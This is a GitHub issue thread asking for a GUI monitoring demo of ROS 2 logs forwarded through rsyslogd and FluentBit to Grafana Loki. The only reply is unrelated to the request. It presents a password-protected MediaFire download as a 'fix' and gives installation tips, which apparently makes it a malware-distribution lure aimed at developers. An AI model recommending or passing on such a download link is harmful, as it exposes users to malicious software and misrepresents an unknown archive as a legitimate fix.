### ISSUE TITLE
Support demonstration with GUI Monitor

### ISSUE THREAD

**Issue by fujitatomoya** [fujitatomoya/rcl_logging_syslog#4]
Once log data is forwarded to rsyslogd and FluentBit, we can create the logging data pipeline even with TLS secured connection if necessary. That said user can configure the logging sink, pipeline, behavior as they want based on the application and business requirement.
It would be probably nice to have GUI Monitor demonstration that connects with FluentBit, so that we can show the aggregated ROS 2 log data with fancy look, considering https://grafana.com/oss/loki/

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
